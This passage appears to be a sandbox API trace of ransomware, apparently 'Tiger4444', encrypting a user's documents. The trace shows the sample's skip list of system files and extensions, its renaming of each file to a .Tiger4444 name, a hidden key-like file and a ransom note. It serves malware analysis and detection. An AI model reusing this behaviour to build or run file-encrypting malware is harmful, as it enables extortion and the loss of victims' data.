[0047.442] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13889462490) returned 1 [0047.442] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=31601) returned 1 [0047.442] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0047.442] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0047.442] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e80, lpName=0x0) returned 0x2c8 [0047.442] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e80) returned 0xbe0000 [0047.443] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.443] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0047.443] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.443] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0047.443] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.443] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0047.443] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.443] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0047.443] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13889612650) returned 1 [0047.443] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0047.443] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0047.443] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.444] CloseHandle (hObject=0x2c8) returned 1 [0047.444] CloseHandle (hObject=0x260) returned 1 [0047.444] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\yBFSczQSgZ4zH_5p0CuH.ots.Tiger4444") returned 85 [0047.444] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\yBFSczQSgZ4zH_5p0CuH.ots" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\ybfsczqsgz4zh_5p0cuh.ots"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\yBFSczQSgZ4zH_5p0CuH.ots.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\ybfsczqsgz4zh_5p0cuh.ots.tiger4444"), dwFlags=0x1) returned 1 [0047.445] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=31616 | out: Addend=0xc6f980) returned 23115952 [0047.445] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4878 [0047.445] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf26b540, ftCreationTime.dwHighDateTime=0x1d4d262, ftLastAccessTime.dwLowDateTime=0xe36ef690, ftLastAccessTime.dwHighDateTime=0x1d4c94a, ftLastWriteTime.dwLowDateTime=0xe36ef690, ftLastWriteTime.dwHighDateTime=0x1d4c94a, nFileSizeHigh=0x0, nFileSizeLow=0x7b71, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yBFSczQSgZ4zH_5p0CuH.ots", cAlternateFileName="YBFSCZ~1.OTS")) returned 0 [0047.445] FindClose (in: hFindFile=0xc72f08 | out: hFindFile=0xc72f08) returned 1 [0047.445] lstrcpyW (in: lpString1=0x30aeb0e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.445] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0047.445] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0047.445] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0047.446] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.446] CloseHandle (hObject=0x260) returned 1 [0047.446] CloseHandle (hObject=0x2ac) returned 1 [0047.446] GetCurrentThreadId () returned 0xfa8 [0047.446] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66448 [0047.446] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S" [0047.446] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc83510 | out: hHeap=0xc50000) returned 1 [0047.446] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66440 | out: hHeap=0xc50000) returned 1 [0047.446] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S" [0047.446] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\" [0047.447] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\.BFC0E91B00AE8A0620D3" [0047.447] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0047.450] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0047.699] FlushFileBuffers (hFile=0x2ac) returned 1 [0047.701] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.701] CloseHandle (hObject=0x2ac) returned 1 [0047.702] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S") returned 57 [0047.702] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.702] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x478f9920, ftCreationTime.dwHighDateTime=0x1d4cb37, ftLastAccessTime.dwLowDateTime=0xfbf1f7b0, ftLastAccessTime.dwHighDateTime=0x1d4cb09, ftLastWriteTime.dwLowDateTime=0x814bae07, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc730c8 [0047.702] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.702] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.702] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0047.702] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.702] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x478f9920, ftCreationTime.dwHighDateTime=0x1d4cb37, ftLastAccessTime.dwLowDateTime=0xfbf1f7b0, ftLastAccessTime.dwHighDateTime=0x1d4cb09, ftLastWriteTime.dwLowDateTime=0x814bae07, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.703] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.703] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.703] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0047.703] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.703] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.703] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x814bae07, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x814bae07, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x817435e1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.703] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.703] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.703] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf055dd50, ftCreationTime.dwHighDateTime=0x1d4cafe, ftLastAccessTime.dwLowDateTime=0x2dd316b0, ftLastAccessTime.dwHighDateTime=0x1d4ce93, ftLastWriteTime.dwLowDateTime=0x2dd316b0, ftLastWriteTime.dwHighDateTime=0x1d4ce93, nFileSizeHigh=0x0, nFileSizeLow=0x5ce7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EBFJF68kMJmPOC6j8o0H.docx", cAlternateFileName="EBFJF6~1.DOC")) returned 1 [0047.703] lstrcmpiW (lpString1="EBFJF68kMJmPOC6j8o0H.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.703] lstrcmpiW (lpString1="EBFJF68kMJmPOC6j8o0H.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.703] lstrcmpiW (lpString1="EBFJF68kMJmPOC6j8o0H.docx", lpString2="Tiger4444.exe") returned -1 [0047.703] lstrcmpiW (lpString1="EBFJF68kMJmPOC6j8o0H.docx", lpString2=".") returned 1 [0047.703] lstrcmpiW (lpString1="EBFJF68kMJmPOC6j8o0H.docx", lpString2="..") returned 1 [0047.703] lstrcmpiW (lpString1="EBFJF68kMJmPOC6j8o0H.docx", lpString2="windows") returned -1 [0047.703] lstrcmpiW (lpString1="EBFJF68kMJmPOC6j8o0H.docx", lpString2="bootmgr") returned 1 [0047.703] lstrcmpiW (lpString1="EBFJF68kMJmPOC6j8o0H.docx", lpString2="pagefile.sys") returned -1 [0047.703] lstrcmpiW (lpString1="EBFJF68kMJmPOC6j8o0H.docx", lpString2="boot") returned 1 [0047.703] lstrcmpiW (lpString1="EBFJF68kMJmPOC6j8o0H.docx", lpString2="ids.txt") returned -1 [0047.703] lstrcmpiW (lpString1="EBFJF68kMJmPOC6j8o0H.docx", lpString2="NTUSER.DAT") returned -1 [0047.703] lstrcpyW (in: lpString1=0x30aeb1c, lpString2="EBFJF68kMJmPOC6j8o0H.docx" | out: lpString1="EBFJF68kMJmPOC6j8o0H.docx") returned="EBFJF68kMJmPOC6j8o0H.docx" [0047.703] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\EBFJF68kMJmPOC6j8o0H.docx", dwFileAttributes=0x0) returned 1 [0047.704] lstrlenW (lpString="EBFJF68kMJmPOC6j8o0H.docx") returned 25 [0047.704] lstrlenW (lpString="Tiger4444") returned 9 [0047.704] lstrcmpiW (lpString1="8o0H.docx", lpString2="Tiger4444") returned -1 [0047.704] lstrlenW (lpString=".dll") returned 4 [0047.704] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0047.704] lstrlenW (lpString=".lnk") returned 4 [0047.704] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0047.704] lstrlenW (lpString=".ini") returned 4 [0047.704] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0047.704] lstrlenW (lpString=".sys") returned 4 [0047.704] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0047.704] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\EBFJF68kMJmPOC6j8o0H.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\ebfjf68kmjmpoc6j8o0h.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.704] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.704] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13915733437) returned 1 [0047.704] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=23783) returned 1 [0047.704] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0047.704] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0047.704] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5ff0, lpName=0x0) returned 0x2c8 [0047.705] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ff0) returned 0xbe0000 [0047.706] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.706] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0047.706] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.706] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0047.706] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.706] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0047.706] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.706] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0047.706] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13915930130) returned 1 [0047.706] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0047.706] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0047.706] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.707] CloseHandle (hObject=0x2c8) returned 1 [0047.707] CloseHandle (hObject=0x260) returned 1 [0047.708] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\EBFJF68kMJmPOC6j8o0H.docx.Tiger4444") returned 93 [0047.708] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\EBFJF68kMJmPOC6j8o0H.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\ebfjf68kmjmpoc6j8o0h.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\EBFJF68kMJmPOC6j8o0H.docx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\ebfjf68kmjmpoc6j8o0h.docx.tiger4444"), dwFlags=0x1) returned 1 [0047.708] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=23792 | out: Addend=0xc6f980) returned 23147568 [0047.708] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4879 [0047.708] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97048230, ftCreationTime.dwHighDateTime=0x1d4ca70, ftLastAccessTime.dwLowDateTime=0xbec93c80, ftLastAccessTime.dwHighDateTime=0x1d4d492, ftLastWriteTime.dwLowDateTime=0xbec93c80, ftLastWriteTime.dwHighDateTime=0x1d4d492, nFileSizeHigh=0x0, nFileSizeLow=0xb468, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rMkT8DHQ-.pdf", cAlternateFileName="RMKT8D~1.PDF")) returned 1 [0047.709] lstrcmpiW (lpString1="rMkT8DHQ-.pdf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.709] lstrcmpiW (lpString1="rMkT8DHQ-.pdf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.709] lstrcmpiW (lpString1="rMkT8DHQ-.pdf", lpString2="Tiger4444.exe") returned -1 [0047.709] lstrcmpiW (lpString1="rMkT8DHQ-.pdf", lpString2=".") returned 1 [0047.709] lstrcmpiW (lpString1="rMkT8DHQ-.pdf", lpString2="..") returned 1 [0047.709] lstrcmpiW (lpString1="rMkT8DHQ-.pdf", lpString2="windows") returned -1 [0047.709] lstrcmpiW (lpString1="rMkT8DHQ-.pdf", lpString2="bootmgr") returned 1 [0047.709] lstrcmpiW (lpString1="rMkT8DHQ-.pdf", lpString2="pagefile.sys") returned 1 [0047.709] lstrcmpiW (lpString1="rMkT8DHQ-.pdf", lpString2="boot") returned 1 [0047.709] lstrcmpiW (lpString1="rMkT8DHQ-.pdf", lpString2="ids.txt") returned 1 [0047.709] lstrcmpiW (lpString1="rMkT8DHQ-.pdf", lpString2="NTUSER.DAT") returned 1 [0047.709] lstrcpyW (in: lpString1=0x30aeb1c, lpString2="rMkT8DHQ-.pdf" | out: lpString1="rMkT8DHQ-.pdf") returned="rMkT8DHQ-.pdf" [0047.709] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\rMkT8DHQ-.pdf", dwFileAttributes=0x0) returned 1 [0047.709] lstrlenW (lpString="rMkT8DHQ-.pdf") returned 13 [0047.709] lstrlenW (lpString="Tiger4444") returned 9 [0047.709] lstrcmpiW (lpString1="8DHQ-.pdf", lpString2="Tiger4444") returned -1 [0047.709] lstrlenW (lpString=".dll") returned 4 [0047.709] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.709] lstrlenW (lpString=".lnk") returned 4 [0047.709] lstrcmpiW (lpString1=".pdf", lpString2=".lnk") returned 1 [0047.709] lstrlenW (lpString=".ini") returned 4 [0047.709] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0047.709] lstrlenW (lpString=".sys") returned 4 [0047.709] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0047.710] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\rMkT8DHQ-.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\rmkt8dhq-.pdf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.710] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.710] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13916286026) returned 1 [0047.710] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=46184) returned 1 [0047.710] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0047.710] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0047.710] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb770, lpName=0x0) returned 0x2c8 [0047.710] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb770) returned 0xbe0000 [0047.712] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.712] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0047.712] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.712] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0047.712] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.712] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0047.712] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.712] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0047.712] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13916507505) returned 1 [0047.712] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0047.712] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0047.712] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.713] CloseHandle (hObject=0x2c8) returned 1 [0047.713] CloseHandle (hObject=0x260) returned 1 [0047.714] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\rMkT8DHQ-.pdf.Tiger4444") returned 81 [0047.714] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\rMkT8DHQ-.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\rmkt8dhq-.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\rMkT8DHQ-.pdf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\rmkt8dhq-.pdf.tiger4444"), dwFlags=0x1) returned 1 [0047.714] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=46192 | out: Addend=0xc6f980) returned 23171360 [0047.714] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4880 [0047.715] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9a3cd60, ftCreationTime.dwHighDateTime=0x1d4c9a1, ftLastAccessTime.dwLowDateTime=0xcd3b9460, ftLastAccessTime.dwHighDateTime=0x1d4cbb5, ftLastWriteTime.dwLowDateTime=0xcd3b9460, ftLastWriteTime.dwHighDateTime=0x1d4cbb5, nFileSizeHigh=0x0, nFileSizeLow=0x3a54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TUjgZaL_tfSm-QNcJ8.ods", cAlternateFileName="TUJGZA~1.ODS")) returned 1 [0047.715] lstrcmpiW (lpString1="TUjgZaL_tfSm-QNcJ8.ods", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.715] lstrcmpiW (lpString1="TUjgZaL_tfSm-QNcJ8.ods", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.715] lstrcmpiW (lpString1="TUjgZaL_tfSm-QNcJ8.ods", lpString2="Tiger4444.exe") returned 1 [0047.715] lstrcmpiW (lpString1="TUjgZaL_tfSm-QNcJ8.ods", lpString2=".") returned 1 [0047.715] lstrcmpiW (lpString1="TUjgZaL_tfSm-QNcJ8.ods", lpString2="..") returned 1 [0047.715] lstrcmpiW (lpString1="TUjgZaL_tfSm-QNcJ8.ods", lpString2="windows") returned -1 [0047.715] lstrcmpiW (lpString1="TUjgZaL_tfSm-QNcJ8.ods", lpString2="bootmgr") returned 1 [0047.715] lstrcmpiW (lpString1="TUjgZaL_tfSm-QNcJ8.ods", lpString2="pagefile.sys") returned 1 [0047.715] lstrcmpiW (lpString1="TUjgZaL_tfSm-QNcJ8.ods", lpString2="boot") returned 1 [0047.715] lstrcmpiW (lpString1="TUjgZaL_tfSm-QNcJ8.ods", lpString2="ids.txt") returned 1 [0047.715] lstrcmpiW (lpString1="TUjgZaL_tfSm-QNcJ8.ods", lpString2="NTUSER.DAT") returned 1 [0047.715] lstrcpyW (in: lpString1=0x30aeb1c, lpString2="TUjgZaL_tfSm-QNcJ8.ods" | out: lpString1="TUjgZaL_tfSm-QNcJ8.ods") returned="TUjgZaL_tfSm-QNcJ8.ods" [0047.715] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\TUjgZaL_tfSm-QNcJ8.ods", dwFileAttributes=0x0) returned 1 [0047.715] lstrlenW (lpString="TUjgZaL_tfSm-QNcJ8.ods") returned 22 [0047.715] lstrlenW (lpString="Tiger4444") returned 9 [0047.715] lstrcmpiW (lpString1="QNcJ8.ods", lpString2="Tiger4444") returned -1 [0047.715] lstrlenW (lpString=".dll") returned 4 [0047.715] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0047.715] lstrlenW (lpString=".lnk") returned 4 [0047.715] lstrcmpiW 